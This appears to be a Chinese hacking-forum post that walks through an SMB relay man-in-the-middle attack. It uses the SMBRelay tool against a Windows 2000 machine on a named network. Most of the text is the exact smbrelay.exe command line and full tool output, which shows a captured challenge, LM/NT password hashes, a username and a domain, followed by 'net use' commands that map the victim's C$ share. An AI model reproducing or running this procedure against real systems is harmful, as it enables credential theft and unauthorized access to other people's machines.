SMBRELAY终极应用
SMBRELAY终极应用:
说明::这次攻击过程只需要2台机器,3个IP地址关于协议与IP问题的说明:我的IP是218.197.248.212,可是SMBRELAY无法运行在这个IP上,而且我只有把自己机器上“打印机与文件共享”服务删除后才能接受目标机器传来的HASH,218.197.248.154是一个不存在的IP地址,所以我把SMBRELAY绑在218.197.248.154上,测试的时候,实际上是212(我自己)-----154(绑SMBRELAY的机器)----249(受害机器)---------------------------------------------------------------------D:\>smbrelay.exe /IL 2 /IR 2 /L+ 218.197.248.154 /R- 218.197.248.154SMBRelay v0.981 - TCP (NetBT) level SMB man-in-the-middle relay attack Copyright 2001: Sir Dystic, Cult of the Dead Cow Send complaints, ideas and donations to sirdystic@cultdeadcow.comUsing local adapter index 2: PCI Bus Master AdapterLocal IP address added to interface 2Bound to port 139 on address 218.197.248.154Connection from 202.114.28.249:1915Request type: Session Request 72 bytesSource name: VODSER <00>Target name: *SMBSERVER <20>Setting target name to source name and source name to <|>CDC4EVER<|>...Response: Positive Session Response 4 bytesRequest type: Session Message 137 bytesSMB_COM_NEGOTIATEResponse: Session Message 115 bytesChallenge (8 bytes): 33C0E036880693BBRequest type: Session Message 290 bytesSMB_COM_SESSION_SETUP_ANDXPassword lengths: 24 24Case insensitive password: FA31DD7DA7659D4DB6273B2AC9AF9FCCEA912F843B5A1874Case sensitive password: E53DFF557C5E7C37FD34FB5FD959CC26DB335F4C2AB44585Username: "UUSER_VODSER"Domain: "VODSER"OS: "Windows 2000 2195"Lanman type: "Windows 2000 5.0"???: ""Response: Session Message 154 bytesOS: "Windows 5.0"Lanman type: "Windows 2000 LAN Manager"Domain: "WORKGROUP"Password hash written to diskConnected?Bound to port 139 on address 218.197.248.154 relaying for host VODSER 202.114.28.249--------------------------------------------------------------------------------这时候,我已经抓到对方HASH了,下面是影射对方C盘----------------------------------------E:\>net use \\218.197.248.154命令成功完成。E:\>net use h: \\218.197.248.154\c$命令成功完成。----------------------------------------------------------------------------第一屏的显示如下---------------------------------------------------------Connection rejected: 202.114.28.249 already connected*** Relay connection for target VODSER received from 218.197.248.212:1615 *** Sent positive session response for relay target VODSER *** Sent dialect selection response (5) for target VODSER *** Sent SMB Session setup response for relay to VODSERTermination requested...Deleted incoming IP address *** Relay disconnected from target VODSER*** Target VODSER DisconnectedExiting main-------------------------------------------------------------------------